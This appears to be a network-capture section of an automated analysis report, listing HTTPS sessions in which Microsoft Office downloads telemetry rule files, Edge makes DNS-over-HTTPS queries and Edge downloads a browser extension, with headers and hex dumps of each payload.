                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080639Z-174f78459684bddphC1EWRbht40000000wf0000000001mkp
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    52192.168.2.74979213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:43 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f869b653-801e-008c-3284-407130000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080643Z-174f7845968cdxdrhC1EWRg0en0000000wh000000000ar20
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:43 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    53192.168.2.74979313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:39 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 425
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080639Z-174f7845968kvnqxhC1EWRmf3g0000000fbg00000000b4xs
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    54192.168.2.74979413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:39 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080639Z-174f7845968zgtf6hC1EWRqd8s0000000png000000003xcw
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    55192.168.2.749809172.64.41.34438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:41 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    CF-RAY: 8e909eccce344240-EWR
                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    56192.168.2.749811162.159.61.34438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:41 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    CF-RAY: 8e909eccda5cc3fa-EWR
                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ec 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom(c)


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    57192.168.2.749810172.64.41.34438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:41 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    CF-RAY: 8e909eccdaff42ad-EWR
                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 13 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    58192.168.2.749805172.217.19.2254438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:41 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    Content-Length: 138356
                                                                                                                                                                                                                                                                                                                    X-GUploader-UploadID: AFiumC40JuKeWi09IlidgJzdwnB85_wF1eJ2XjVMAmpyXMVcNz2b4RW9T8-1zaN1sSIN4kxE6mBvKlZsrQ
                                                                                                                                                                                                                                                                                                                    X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 26 Nov 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                    Age: 55302
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC817INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                                    Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:42 UTC1390INData Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c
                                                                                                                                                                                                                                                                                                                    Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\
